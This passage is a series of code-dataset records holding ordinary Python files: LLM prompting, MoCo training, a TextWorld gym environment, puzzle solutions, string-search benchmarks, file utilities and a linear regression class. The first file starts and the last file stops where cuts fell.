model_name=='llama-2-70b':\n config = AutoConfig.from_pretrained(\"/lustre/S/liwenyi/llm/Llama-2-70b-chat-hf/\",trust_remote_code=True)\n model = AutoModelForCausalLM.from_pretrained(\"/lustre/S/liwenyi/llm/Llama-2-70b-chat-hf/\",config=config,device_map='auto',trust_remote_code=False)\n tokenizer = 
AutoTokenizer.from_pretrained(\"/lustre/S/liwenyi/llm/Llama-2-70b-chat-hf/\")\n generator = pipeline(model=model,tokenizer=tokenizer,device_map='auto',framework='pt',task='text-generation',\\\n max_new_tokens=max_new_tokens,do_sample=do_sample,num_beams=num_beams,diversity_penalty=diversity_penalty,\\\n temperature=temperature,top_k=top_k,top_p=top_p,repetition_penalty=repetition_penalty,min_new_tokens=10)\n elif model_name=='bloomz':\n config = AutoConfig.from_pretrained(\"/lustre/S/liwenyi/llm/bloomz/\",trust_remote_code=True)\n model = AutoModelForCausalLM.from_pretrained(\"/lustre/S/liwenyi/llm/bloomz/\",config=config,device_map='auto',trust_remote_code=True,load_in_8bit=True)\n tokenizer = AutoTokenizer.from_pretrained(\"/lustre/S/liwenyi/llm/bloomz/\")\n generator = pipeline(model=model,tokenizer=tokenizer,device_map='auto',framework='pt',task='text-generation',\\\n max_new_tokens=max_new_tokens,do_sample=do_sample,num_beams=num_beams,diversity_penalty=diversity_penalty,\\\n temperature=temperature,top_k=top_k,top_p=top_p,repetition_penalty=repetition_penalty,min_new_tokens=10)\n\n else:\n raise Exception(\"Invalid model name.\")\n\n for prompt in tqdm(prompt_list):\n result = generator(prompt,return_full_text=False)[0]['generated_text']\n result_list.append(result)\n print(result_list[-1])\n return result_list\n \n'''\n for prompt in tqdm(prompt_list):\n inputs=tokenizer(prompt,return_tensors='pt').to('cuda')\n generate_ids=model.generate(**inputs,max_new_tokens=max_new_tokens,do_sample=do_sample,num_beams=num_beams,diversity_penalty=diversity_penalty,\\\n temperature=temperature,top_k=top_k,top_p=top_p,repetition_penalty=repetition_penalty,min_new_tokens=10)\n result_list.append(tokenizer.batch_decode(generate_ids,skip_special_tokens=True,clean_up_tokenization_spaces=False))\n return result_list\n'''\nif args.model=='gpt-3.5':\n prompt_list=prompt_file[args.prompt_type].tolist()\n output=[]\n for prompt in tqdm(prompt_list):\n message=prompt\n user_assistant_msgs = {\"role\": \"user\", \"content\": message}\n response = openai.ChatCompletion.create(model='gpt-3.5-turbo-0613',\n messages=[user_assistant_msgs])\n status_code = response[\"choices\"][0][\"finish_reason\"]\n assert status_code == \"stop\", f\"The status code was {status_code}.\"\n returned_text = response[\"choices\"][0][\"message\"][\"content\"]\n output.append(returned_text)\n print(output[-1])\nelse:\n output=generate(model_name=args.model,prompt_list=prompt_file[args.prompt_type].tolist())\noutput=pd.Series(output)\noutput.to_csv(\"./result/\"+args.model+'_'+args.task+'_'+args.prompt_type+'_'+datetime.datetime.now().strftime(\"%Y%m%d\")+\".csv\",index=False)\n\n\n\n\n\n\n\n","repo_name":"wenyi-li/LLM_Creativity","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":7072,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"21908600485","text":"\"\"\"Trains an encoder network using self-supervised learning. 
\n\nUsage example: \n> python train_ssl.py --data_path ../data/images.h5 --augmentations jcrg --output_dir ../experiments/test/\n --batch_size 256 --learning_rate 0.03 --max_epochs 1 --max_num_samples 2048 \n\nImportant parameters for training\n\n\nCurrently supports MocoV2.\n\nDDP training encouraged!\n\"\"\"\n\n# To prevent OpenBLAS blas_thread_init\n# os.environ['OPENBLAS_NUM_THREADS'] = '1'\n\nimport numpy as np\nimport torch\nimport torchvision\nimport pytorch_lightning as pl\nimport h5py\n\nimport argparse\nimport logging\n\nfrom pathlib import Path\nimport os\nimport sys\nimport glob\n\nfrom pytorch_lightning import loggers as pl_loggers\n# from pl_bolts.models.self_supervised import Moco_v2\nfrom pytorch_lightning.plugins import DDPPlugin\n\nfrom ssl_legacysurvey.moco.moco2_module import Moco_v2\nfrom ssl_legacysurvey.data_loaders import datamodules\nfrom ssl_legacysurvey.utils import format_logger\n\ndef parse_arguments():\n \"\"\"\n Parse command line arguments\n \"\"\"\n parser = argparse.ArgumentParser(description='runtime parameters')\n # Data loading\n parser.add_argument(\"--data_path\", type=str, default='/pscratch/sd/g/gstein/machine_learning/decals_self_supervised/data/images_npix152_000000000_003500000.h5',\n help=\"Path to hdf5 data file\")\n \n parser.add_argument(\"--num_workers\", type=int, default=16,\n help=\"Number of workers for data loader\")\n\n # Training \n parser.add_argument(\"--gpu\", action=\"store_true\",\n help=\"Use GPU\")\n\n parser.add_argument(\"--gpus\", type=int, default=-1,\n help=\"Number of gpus to use\")\n\n parser.add_argument(\"--num_nodes\", type=int, default=1,\n help=\"Number of gpu nodes available\")\n\n # ddp does not work in ipython notebook, only ddp_spawn does\n parser.add_argument(\"--strategy\", type=str, default='ddp', #'ddp_spawn',\n help=\"Distributed training strategy\")\n\n parser.add_argument(\"--fast_dev_run\", action=\"store_true\",\n help=\"Run only a few batches\")\n\n parser.add_argument(\"--check_val_every_n_epoch\", type=int, default=999,\n help=\"How often to run validation epoch\")\n \n parser.add_argument(\"--checkpoint_every_n_epochs\", type=int, default=1,\n help=\"Checkpoint model every n epochs\")\n\n parser.add_argument(\"--save_top_k\", type=int, default=5,\n help=\"Top number of checkpoints to save\")\n\n parser.add_argument(\"--num_sanity_val_steps\", type=int, default=0,\n help=\"Number of validation steps to run right after model initialization\")\n\n parser.add_argument(\"--max_num_samples\", type=int, default=None,\n help=\"Maximum number of data samples to use. Defaults to full dataset size\")\n\n # Augmentations\n parser.add_argument(\"--augmentations\", type=str, default='grrrssgbjcgnrg',\n help=\"2 character abbreviations of training augmentations to use\")\n\n parser.add_argument(\"--val_augmentations\", type=str, default='ccrg',\n help=\"2 character abbreviations of validation augmentations to use\")\n\n parser.add_argument(\"--jitter_lim\", type=int, default=7,\n help=\"Number of pixels in x,y to jitter image. 
(-jitter_lim, jitter_lim)\")\n\n parser.add_argument(\"--only_dered\", action=\"store_true\",\n help=\"Deredden if calling gr augmentation\")\n\n parser.add_argument(\"--only_red\", action=\"store_true\",\n help=\"Redden if calling gr augmentation\")\n\n parser.add_argument(\"--ebv_max\", type=float, default=1.0,\n help=\"Maximum extinction reddening to use if calling gr augmentation\")\n\n parser.add_argument(\"--gn_uniform\", action=\"store_false\",\n help=\"Draw from uniform Gaussian noise if using gn augmentation\")\n\n parser.add_argument(\"--gb_uniform\", action=\"store_false\",\n help=\"Draw from uniform Gaussian blur if using gb augmentation\")\n\n parser.add_argument(\"--gr_uniform\", action=\"store_false\",\n help=\"Draw from uniform Galactic reddenning if using gr augmentation\")\n\n # Optimizers\n parser.add_argument(\"--batch_size\", type=int, default=256,\n help=\"Batch size for model training\")\n\n parser.add_argument(\"--learning_rate\", type=float, default=0.03,\n help=\"Learning rate for model optimization\")\n\n parser.add_argument(\"--encoder_momentum\", type=float, default=0.996,\n help=\"Mocov2 encoder momentum\")\n\n parser.add_argument(\"--softmax_temperature\", type=float, default=0.2,\n help=\"Mocov2 softmax temperature\")\n\n parser.add_argument(\"--max_epochs\", type=int, default=1,\n help=\"Max number of training epochs\")\n\n parser.add_argument(\"--optimizer\", type=str, default='SGD',\n help=\"Optimizer to use - Mocov2 only accepts SGD\", choices=['SGD'])\n\n parser.add_argument(\"--test_run\", action=\"store_true\",\n help=\"Subsample training and validation data\")\n\n parser.add_argument(\"--seed\", type=int , default=13579,\n help=\"random seed for train test split\")\n\n # Model architecture and settings\n parser.add_argument(\"--backbone\", type=str, default='resnet18',\n help=\"Encoder architecture to use\", choices=['resnet18', 'resnet34', 'resnet50', 'resnet152'])\n \n parser.add_argument(\"--use_mlp\", action=\"store_true\",\n help=\"use projection head\")\n\n parser.add_argument(\"--emb_dim\", type=int, default=128,\n help=\"Dimensionality where loss is calculated\")\n\n parser.add_argument(\"--num_negatives\", type=int, default=65536,\n help=\"Number of negative samples to keep in queue\")\n\n # Setup outputs and others\n parser.add_argument(\"--ckpt_path\", type=str, default=None,\n help=\"Continue training from checkpoint on disk\")\n\n parser.add_argument(\"--output_dir\", type=str, default='../experiments/test/',\n help=\"directory to save trained model and logs\")\n\n parser.add_argument(\"--logfile_name\", type=str, default='ssl_train.log',\n help=\"name of log file\")\n \n parser.add_argument(\"-v\", \"--verbose\", action=\"store_true\",\n help=\"increase output verbosity\")\n\n args = parser.parse_args()\n\n return args\n\ndef main(args):\n \"\"\"Sets up model, sets training parameters, configures training callbacks, then trains model\"\"\"\n\n params = vars(args) # convert args to dictionary\n params['ssl_training'] = True\n \n pl.seed_everything(params['seed'], workers=True)\n Path(params['output_dir']).mkdir(parents=True, exist_ok=True)\n\n logger = format_logger.create_logger(\n filename=os.path.join(params['output_dir'], params['logfile_name']),\n )\n\n logger.info(\"\\nTraining with the following parameters:\")\n for k, v in params.items():\n logger.info(f\"{k}: {v}\")\n\n file_output_head = f\"bs{params['batch_size']}_lr{params['learning_rate']}_tau{params['softmax_temperature']}\"\n\n if params['ckpt_path']:\n # Load pretrained 
backbone from checkpoint on disk\n model = Moco_v2.load_from_checkpoint(\n checkpoint_path=params['ckpt_path'],\n )\n else:\n # Train from scratch\n model = Moco_v2(\n base_encoder=params['backbone'],\n emb_dim=params['emb_dim'],\n use_mlp=params['use_mlp'],\n encoder_momentum=params['encoder_momentum'],\n softmax_temperature=params['softmax_temperature'],\n learning_rate=params['learning_rate'],\n batch_size=params['batch_size'],\n num_negatives=params['num_negatives'],\n )\n \n datamodule = datamodules.DecalsDataModule(params)\n\n # Log various attributes during training\n tb_logger = pl_loggers.TensorBoardLogger(\n save_dir=params['output_dir'],\n name=file_output_head,\n )\n\n checkpoint_callback = pl.callbacks.ModelCheckpoint(\n dirpath=params['output_dir'],\n filename=file_output_head+'_{epoch:03d}',\n #monitor='train_acc1',\n #mode='max',\n every_n_epochs=params['checkpoint_every_n_epochs'],\n save_top_k=-1,\n save_on_train_epoch_end=True,\n verbose=True,\n save_last=True,\n )\n\n lr_monitor = pl.callbacks.LearningRateMonitor(\n logging_interval='epoch',\n )\n\n if params['strategy'] == 'ddp':\n # DDP set by just Trainer(strategy='ddp') will complain about spending time finding unused parameters\n # Given the model should not have any unused parameters set it explicitly with DDPPlugin\n strategy = DDPPlugin(find_unused_parameters=False)\n else:\n strategy = params['strategy']\n\n trainer = pl.Trainer.from_argparse_args(\n args,\n strategy=strategy,\n callbacks=[checkpoint_callback, lr_monitor],\n logger=tb_logger,\n )\n\n logger.info(\"Training Model\")\n # Fit model\n trainer.fit(\n model,\n datamodule=datamodule,\n ckpt_path=params['ckpt_path']\n )\n\nif __name__=='__main__':\n\n args = parse_arguments()\n \n main(args)\n","repo_name":"georgestein/ssl-legacysurvey","sub_path":"scripts/train_ssl.py","file_name":"train_ssl.py","file_ext":"py","file_size_in_byte":9447,"program_lang":"python","lang":"en","doc_type":"code","stars":31,"dataset":"github-code","pt":"21"} +{"seq_id":"26158528710","text":"import sys\nimport textwrap\nfrom io import StringIO\nfrom typing import List, Optional, Dict, Any, Tuple, Union\n\nimport numpy as np\nimport gym\nfrom gym.utils import colorize\nfrom gym.spaces import Space\n\nfrom textworld import EnvInfos\nfrom textworld.envs.wrappers import Filter, GenericEnvironment, Limit\nfrom textworld.envs.batch import AsyncBatchEnv, SyncBatchEnv\n\nfrom textworld.gym.envs.utils import shuffled_cycle\n\nfrom functools import partial\n\n\ndef _make_env(request_infos, max_episode_steps=None):\n env = GenericEnvironment(request_infos)\n if max_episode_steps:\n env = Limit(env, max_episode_steps=max_episode_steps)\n\n env = Filter(env)\n return env\n\n\nclass TextworldBatchGymEnv(gym.Env):\n metadata = {'render.modes': ['human', 'ansi', 'text']}\n\n def __init__(self,\n gamefiles: List[str],\n request_infos: Optional[EnvInfos] = None,\n batch_size: int = 1,\n asynchronous: bool = True,\n auto_reset: bool = False,\n max_episode_steps: Optional[int] = None,\n action_space: Optional[gym.Space] = None,\n observation_space: Optional[gym.Space] = None) -> None:\n \"\"\" Environment for playing text-based games in batch.\n\n Arguments:\n gamefiles:\n Paths of every game composing the pool (`*.ulx|*.z[1-8]|*.json`).\n request_infos:\n For customizing the information returned by this environment\n (see\n :py:class:`textworld.EnvInfos `\n for the list of available information).\n\n .. 
warning:: Only supported for TextWorld games (i.e., that have a corresponding `*.json` file).\n batch_size:\n If provided, it indicates the number of games to play at the same time.\n By default, a single game is played at once.\n\n .. warning:: When `batch_size` is provided (even for batch_size=1), `env.step` expects\n a list of commands as input and outputs a list of states. `env.reset` also\n outputs a list of states.\n asynchronous:\n If `True`, wraps the environments in an `AsyncBatchEnv` (which uses\n `multiprocessing` to run the environments in parallel). If `False`,\n wraps the environments in a `SyncBatchEnv`. Default: `True`.\n auto_reset:\n If `True`, each game *independently* resets once it is done (i.e., reset happens\n on the next `env.step` call).\n Otherwise, once a game is done, subsequent calls to `env.step` won't have any effects.\n max_episode_steps:\n Number of steps allocated to play each game. Once exhausted, the game is done.\n action_space:\n The action space be used with OpenAI baselines.\n (see :py:class:`textworld.gym.spaces.Word `).\n observation_space:\n The observation space be used with OpenAI baselines\n (see :py:class:`textworld.gym.spaces.Word `).\n \"\"\"\n self.gamefiles = gamefiles\n self.batch_size = batch_size\n self.request_infos = request_infos or EnvInfos()\n self.seed(1234)\n\n env_fns = [partial(_make_env, self.request_infos, max_episode_steps) for _ in range(self.batch_size)]\n BatchEnvType = AsyncBatchEnv if self.batch_size > 1 and asynchronous else SyncBatchEnv\n self.batch_env = BatchEnvType(env_fns, auto_reset)\n\n self.action_space = action_space or Space()\n self.observation_space = observation_space or Space()\n\n def seed(self, seed: Optional[int] = None) -> List[int]:\n \"\"\" Set the seed for this environment's random generator(s).\n\n This environment use a random generator to shuffle the order in which\n the games are played.\n\n Arguments:\n seed: Number that will be used to seed the random generators.\n\n Returns:\n All the seeds used to set this environment's random generator(s).\n \"\"\"\n # We shuffle the order in which the game will be seen.\n rng = np.random.RandomState(seed)\n gamefiles = list(self.gamefiles) # Soft copy to avoid shuffling original list.\n rng.shuffle(gamefiles)\n\n # Prepare iterator used for looping through the games.\n self._gamefiles_iterator = shuffled_cycle(gamefiles, rng=rng)\n return [seed]\n\n def reset(self) -> Tuple[List[str], Dict[str, List[Any]]]:\n \"\"\" Resets the text-based environment.\n\n Resetting this environment means starting the next game in the pool.\n\n Returns:\n A tuple (observations, infos) where\n\n * observation: text observed in the initial state for each game in the batch;\n * infos: additional information as requested for each game in the batch.\n \"\"\"\n if self.batch_env is not None:\n self.batch_env.close()\n\n gamefiles = [next(self._gamefiles_iterator) for _ in range(self.batch_size)]\n self.batch_env.load(gamefiles)\n\n self.last_commands = [None] * self.batch_size\n self.obs, infos = self.batch_env.reset()\n return self.obs, infos\n\n def skip(self, nb_games: int = 1) -> None:\n \"\"\" Skip games.\n\n Arguments:\n nb_games: Number of games to skip.\n \"\"\"\n for _ in range(nb_games):\n next(self._gamefiles_iterator)\n\n def step(self, commands) -> Tuple[List[str], List[float], List[bool], Dict[str, List[Any]]]:\n \"\"\" Runs a command in each text-based environment of the batch.\n\n Arguments:\n commands: Text command to send to the game interpreter.\n\n Returns:\n 
A tuple (observations, scores, dones, infos) where\n\n * observations: text observed in the new state for each game in the batch;\n * scores: total number of points accumulated so far for each game in the batch;\n * dones: whether each game in the batch is finished or not;\n * infos: additional information as requested for each game in the batch.\n \"\"\"\n self.last_commands = commands\n self.obs, scores, dones, infos = self.batch_env.step(self.last_commands)\n return self.obs, scores, dones, infos\n\n def close(self) -> None:\n \"\"\" Close this environment. \"\"\"\n\n if self.batch_env is not None:\n self.batch_env.close()\n\n self.batch_env = None\n\n def render(self, mode: str = 'human') -> Optional[Union[StringIO, str]]:\n \"\"\" Renders the current state of each environment in the batch.\n\n Each rendering is composed of the previous text command (if there's one) and\n the text describing the current observation.\n\n Arguments:\n mode:\n Controls where and how the text is rendered. Supported modes are:\n\n * human: Display text to the current display or terminal and\n return nothing.\n * ansi: Return a `StringIO` containing a terminal-style\n text representation. The text can include newlines and ANSI\n escape sequences (e.g. for colors).\n * text: Return a string (`str`) containing the text without\n any ANSI escape sequences.\n\n Returns:\n Depending on the `mode`, this method returns either nothing, a\n string, or a `StringIO` object.\n \"\"\"\n outfile = StringIO() if mode in ['ansi', \"text\"] else sys.stdout\n\n renderings = []\n for last_command, ob in zip(self.last_commands, self.obs):\n msg = ob.rstrip() + \"\\n\"\n if last_command is not None:\n command = \"> \" + last_command\n if mode in [\"ansi\", \"human\"]:\n command = colorize(command, \"yellow\", highlight=False)\n\n msg = command + \"\\n\" + msg\n\n if mode == \"human\":\n # Wrap each paragraph at 80 characters.\n paragraphs = msg.split(\"\\n\")\n paragraphs = [\"\\n\".join(textwrap.wrap(paragraph, width=80)) for paragraph in paragraphs]\n msg = \"\\n\".join(paragraphs)\n\n renderings.append(msg)\n\n outfile.write(\"\\n-----\\n\".join(renderings) + \"\\n\")\n\n if mode == \"text\":\n outfile.seek(0)\n return outfile.read()\n\n if mode == 'ansi':\n return outfile\n","repo_name":"microsoft/TextWorld","sub_path":"textworld/gym/envs/textworld_batch.py","file_name":"textworld_batch.py","file_ext":"py","file_size_in_byte":8675,"program_lang":"python","lang":"en","doc_type":"code","stars":1102,"dataset":"github-code","pt":"21"} +{"seq_id":"26969386345","text":"from collections import defaultdict\n\nTOP = 'top'\nRIGHT = 'right'\nBOT = 'bot'\nLEFT = 'left'\n\nTOP_LEFT = (0, 0)\nTOP_RIGHT = (0, -1)\nBOT_RIGHT = (-1, -1)\nBOT_LEFT = (-1, 0)\n\nLR = (0, 1)\nRL = (0, -1)\nUB = (1, 0)\nBU = (-1, 0)\n\n\nclass ST(object):\n def __init__(self, side, start, delta):\n self.side = side\n self.start = start\n self.delta = delta\n\n\ndirs = {\n ST(TOP, TOP_LEFT, LR),\n ST(RIGHT, TOP_RIGHT, UB),\n ST(BOT, BOT_LEFT, LR),\n ST(LEFT, TOP_LEFT, UB)\n}\n\nCOMPARES = [\n ST(TOP, TOP_LEFT, LR),\n ST(TOP, TOP_RIGHT, RL),\n ST(RIGHT, TOP_RIGHT, UB),\n ST(RIGHT, BOT_RIGHT, BU),\n ST(BOT, BOT_LEFT, LR),\n ST(BOT, BOT_RIGHT, RL),\n ST(LEFT, TOP_LEFT, UB),\n ST(LEFT, BOT_LEFT, BU),\n]\n\n\ndef part1(data):\n rows = parse_data(data)\n tiles = {}\n dim = len(rows[1])\n i = 0\n while i < len(rows):\n tile = int(rows[i].split(' ')[1][:-1])\n tiles[tile] = rows[i + 1: i + 1 + dim]\n i += 2 + dim\n\n matches = defaultdict(dict)\n for t, tile in 
tiles.items():\n for t2, tile2 in tiles.items():\n if t == t2:\n continue\n\n for d in dirs:\n for c in COMPARES:\n m = True\n st1 = d.start\n st2 = c.start\n for i in range(dim):\n if tile[st1[0]][st1[1]] != tile2[st2[0]][st2[1]]:\n m = False\n break\n st1 = (st1[0] + d.delta[0], st1[1] + d.delta[1])\n st2 = (st2[0] + c.delta[0], st2[1] + c.delta[1])\n if m:\n matches[t][d.side] = matches[t].get(d.side, 0) + 1\n\n ret = 1\n for k, v in matches.items():\n if len(v) == 2:\n ret *= k\n return ret\n\n\ndef part2(data):\n rows = parse_data(data)\n\n\ndef parse_data(data):\n rows = data.split('\\n')\n return rows\n","repo_name":"hckhilliam/programming","sub_path":"AdventOfCode/2020/20.py","file_name":"20.py","file_ext":"py","file_size_in_byte":1936,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"74393843253","text":"class Move:\n winTable = [[0, 1, -1],\n [-1, 0, 1],\n [1, -1, 0]]\n\n def __init__(self, result):\n self.result = result\n\n def valueIndex(self) -> int | None:\n if self.result == 'X':\n return -1\n elif self.result == 'Y':\n return 0\n elif self.result == 'Z':\n return 1\n return None\n\n def value(self):\n if self.result == 'X':\n return 0\n elif self.result == 'Y':\n return 3\n elif self.result == 'Z':\n return 6\n return None\n\n def wins(self, otherMove) -> int | None:\n otherValue = None\n if otherMove == 'A':\n otherValue = 0\n elif otherMove == 'B':\n otherValue = 1\n elif otherMove == 'C':\n otherValue = 2\n\n return self.winTable[otherValue].index(self.valueIndex()) + 1\n\n\n def calculateScore(self, otherMove):\n return self.wins(otherMove) + self.value()\n\n\nturns = [line.rstrip('\\n') for line in open('data/data.txt')]\n\ntotal = 0\nfor turn in turns:\n enemy, you = turn.split(' ')\n yourMove = Move(you)\n total += yourMove.calculateScore(enemy)\n\nprint(total)\n","repo_name":"Keeeweee/adventOfCode-2022","sub_path":"day-02/second.py","file_name":"second.py","file_ext":"py","file_size_in_byte":1201,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"72360865333","text":"from tools import string_tool\nfrom src.string import boyemoore, rabinkarp, kmp\nimport time\nimport matplotlib.pyplot as plt\n\n\ndef algorithm_ana(func, slen, plen, times):\n cost_time = 0.0\n for i in range(times):\n txt = string_tool.random_str(slen=slen)\n pat = string_tool.random_str(slen=plen)\n start = time.clock()\n func(txt, pat)\n end = time.clock()\n cost_time += end - start\n \n return cost_time / times\n \n\ndef get_func_name(func):\n return str(func)[10:-19]\n \n \ndef compare_test():\n funcs = [kmp.kmp, kmp.kmp_dfa, boyemoore.boyemoore_search, rabinkarp.rabinkarp_m, rabinkarp.rabinkarp_l]\n all_times = {get_func_name(func):[] for func in funcs}\n x = list(range(10,1000, 10))\n for i in x:\n print(i)\n for func in funcs:\n cost_time = algorithm_ana(func, slen=1000, plen=i, times=10)\n all_times[get_func_name(func)].append(cost_time)\n \n plt.figure()\n for key in all_times.keys():\n plt.plot(x, all_times[key], label=key)\n \n plt.legend()\n plt.show()","repo_name":"grayondream/algorithm-forth","sub_path":"src/string/compare.py","file_name":"compare.py","file_ext":"py","file_size_in_byte":1097,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"42081243956","text":"import os\nimport sys\nimport re\nfrom pickle import NONE\nimport numpy as np\n\nimport logging\nlogging.basicConfig(stream=sys.stdout, level = 
logging.INFO,format = '[%(levelname)s] %(message)s')\nlogger = logging.getLogger(__name__)\n\n# Split a List Into Even Chunks of N Elements\ndef list_split(listA, n, padding_file):\n for x in range(0, len(listA), n):\n every_chunk = listA[x: n+x]\n\n if len(every_chunk) < n:\n every_chunk = every_chunk + \\\n [padding_file for y in range(n-len(every_chunk))]\n yield every_chunk\n\ndef natural_sort(l):\n convert = lambda text: int(text) if text.isdigit() else text.lower()\n alphanum_key = lambda key: [convert(c) for c in re.split('([0-9]+)', key)]\n return sorted(l, key=alphanum_key)\n\ndef get_fileslist_from_dir(dir):\n files_list = []\n\n if os.path.exists(dir) == False:\n logger.error('dir:{} not exist'.format(dir))\n raise RuntimeError()\n\n for f in os.listdir(dir):\n if f.endswith(\".npy\") or f.endswith(\".NPY\") or f.endswith(\".bin\") or f.endswith(\".BIN\"):\n files_list.append(os.path.join(dir, f))\n\n if len(files_list) == 0:\n logger.error('{} of input args not find valid file,valid file format:[*.npy *.NPY *.bin *.BIN]'.format(dir))\n raise RuntimeError()\n files_list.sort()\n return natural_sort(files_list)\n\ndef get_file_datasize(file_path):\n if file_path.endswith(\".NPY\") or file_path.endswith(\".npy\"):\n ndata = np.load(file_path)\n return ndata.nbytes\n else:\n return os.path.getsize(file_path)\n\ndef get_file_content(file_path):\n if file_path.endswith(\".NPY\") or file_path.endswith(\".npy\"):\n return np.load(file_path)\n else:\n with open(file_path, 'rb') as fd:\n barray = fd.read()\n return np.frombuffer(barray, dtype=np.int8)\n\ndef get_ndata_fmt(ndata):\n if ndata.dtype == np.float32 or ndata.dtype == np.float16 or ndata.dtype == np.float64:\n fmt = \"%f\"\n else:\n fmt = \"%d\"\n return fmt\n\ndef save_data_to_files(file_path, ndata):\n if file_path.endswith(\".NPY\") or file_path.endswith(\".npy\"):\n np.save(file_path, ndata)\n elif file_path.endswith(\".TXT\") or file_path.endswith(\".txt\"):\n outdata=ndata.reshape(-1, ndata.shape[-1])\n fmt = get_ndata_fmt(outdata)\n with open(file_path, 'wb') as f:\n for i in range(outdata.shape[0]):\n np.savetxt(f, np.c_[outdata[i]], fmt=fmt, newline=\" \")\n f.write(b\"\\n\")\n else:\n ndata.tofile(file_path)\n","repo_name":"Ascend/tools","sub_path":"ais-bench_workload/tool/ais_bench/ais_bench/infer/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2554,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"21"} +{"seq_id":"14131533412","text":"from __future__ import annotations\nimport numpy as np\nfrom math import sqrt\n\n\nclass Metrics():\n\n @staticmethod\n def mse_(y, y_hat):\n \"\"\"\n Description:\n Calculate the MSE between the predicted output and the real output.\n Args:\n y: has to be a numpy.array, a vector of shape m * 1.\n y_hat: has to be a numpy.array, a vector of shape m * 1.\n Returns:\n mse: has to be a float.\n None if there is a matching shape problem.\n Raises:\n This function should not raise any Exception.\n \"\"\"\n try:\n mse = (1.0 / y.shape[0]) * np.sum((y - y_hat) ** 2, axis=0)\n return float(mse)\n except:\n return None\n\n @staticmethod\n def rmse_(y, y_hat):\n \"\"\"\n Description:\n Calculate the RMSE between the predicted output and the real output.\n Args:\n y: has to be a numpy.array, a vector of shape m * 1.\n y_hat: has to be a numpy.array, a vector of shape m * 1.\n Returns:\n rmse: has to be a float.\n None if there is a matching shape problem.\n Raises:\n This function should not raise any Exception.\n \"\"\"\n try:\n 
rmse = sqrt(Metrics.mse_(y, y_hat))\n            return float(rmse)\n        except:\n            return None\n\n    @staticmethod\n    def mae_(y, y_hat):\n        \"\"\"\n        Description:\n            Calculate the MAE between the predicted output and the real output.\n        Args:\n            y: has to be a numpy.array, a vector of shape m * 1.\n            y_hat: has to be a numpy.array, a vector of shape m * 1.\n        Returns:\n            mae: has to be a float.\n            None if there is a matching shape problem.\n        Raises:\n            This function should not raise any Exception.\n        \"\"\"\n        try:\n            mae = (1.0 / y.shape[0]) * np.sum(np.absolute(y - y_hat), axis=0)\n            return float(mae)\n        except:\n            return None\n\n    @staticmethod\n    def r2score_(y, y_hat):\n        \"\"\"\n        Description:\n            Calculate the R2score between the predicted output and the output.\n        Args:\n            y: has to be a numpy.array, a vector of shape m * 1.\n            y_hat: has to be a numpy.array, a vector of shape m * 1.\n        Returns:\n            r2score: has to be a float.\n            None if there is a matching shape problem.\n        Raises:\n            This function should not raise any Exception.\n        \"\"\"\n        try:\n            mean = np.mean(y, axis=0)\n            residual = np.sum((y_hat - y) ** 2, axis=0)\n            m_var = np.sum((y - mean) ** 2, axis=0)\n            r2 = 1 - (residual / m_var)\n            return float(r2)\n        except:\n            return None\n\n\nclass MyLinearRegression(Metrics):\n    \"\"\" Homemade linear regression class to fit like a tiny boss-ish\n    \"\"\"\n    CLS_loss_fct = Metrics.mse_\n\n    def __init__(self, thetas, alpha=1e-2, max_iter=1000):\n        # Checking of the attributes:\n        if (not isinstance(thetas, (np.ndarray, tuple, list))) \\\n                or (not isinstance(alpha, (int, float))) \\\n                or (not isinstance(max_iter, int)):\n            s = \"At least one of the parameters is not of expected type.\"\n            raise TypeError(s)\n\n        # Testing the shape of the parameters.\n        thetas = self._convert_thetas_(thetas)\n        if (alpha >= 1) or (alpha <= 0) or (max_iter <= 0):\n            return None\n        # Casting self.theta to float, in case it is integer\n        self.thetas = thetas.astype('float64')\n        self.alpha = float(alpha)\n        self.max_iter = max_iter\n\n    @staticmethod\n    def _convert_thetas_(thetas):\n        if isinstance(thetas, np.ndarray):\n            return thetas\n        return np.array(thetas).reshape(-1, 1)\n\n    def _gradient_(self, x, y):\n        \"\"\" Private gradient function; no test is performed on the\n        parameters. This avoids repeating the same useless tests on each\n        call of gradient in the fit method.\n        \"\"\"\n        xp = np.hstack((np.ones((x.shape[0], 1)), x))\n        return xp.T @ (xp @ self.thetas - y) / x.shape[0]\n\n    def gradient(self, x, y):\n        \"\"\"Computes a gradient vector from three non-empty numpy.array,\n        without any for-loop. 
The three arrays must have compatible\n shapes.\n Args:\n x: has to be an numpy.array, a vector of shape m * 1.\n y: has to be an numpy.array, a vector of shape m * 1.\n theta: has to be an numpy.array, a 2 * 1 vector.\n Return:\n The gradient as a numpy.array, a vector of shape 2 * 1.\n None if x, y, or theta are empty numpy.array.\n None if x, y and theta do not have compatible shapes.\n None if x, y or theta is not of the expected type.\n Raises:\n This function should not raise any Exception.\n \"\"\"\n try:\n # Testing the type of the parameters, numpy array expected.\n if (not isinstance(x, np.ndarray)) \\\n or (not isinstance(y, np.ndarray)) \\\n or (not isinstance(self.thetas, np.ndarray)):\n return None\n\n # Testing the shape of the paramters.\n if (x.shape[1] != 1) or (y.shape[1] != 1) \\\n or (self.thetas.shape[1] != 1) \\\n or (x.shape[0] != y.shape[0]):\n return None\n grad = self._gradient_(x, y)\n\n return grad\n except:\n return None\n\n def fit_(self, x, y):\n \"\"\"\n Description:\n Fits the model to the training dataset contained in x and y.\n Args:\n x: has to be a numpy.array, a vector of shape m * 1:\n (number of training examples, 1).\n y: has to be a numpy.array, a vector of shape m * 1:\n (number of training examples, 1).\n theta: has to be a numpy.array, a vector of shape 2 * 1.\n alpha: has to be a float, the learning rate\n max_iter: has to be an int, the number of iterations done during\n the gradient descent\n Return:\n new_theta: numpy.array, a vector of shape 2 * 1.\n None if there is a matching shape problem.\n None if x, y, theta, alpha or max_iter is not of the expected type.\n Raises:\n This function should not raise any Exception.\n \"\"\"\n try:\n # Checking x, y and theta are numpy array\n if (not isinstance(x, np.ndarray)) \\\n or (not isinstance(y, np.ndarray)) \\\n or (not isinstance(self.thetas, np.ndarray)):\n return None\n 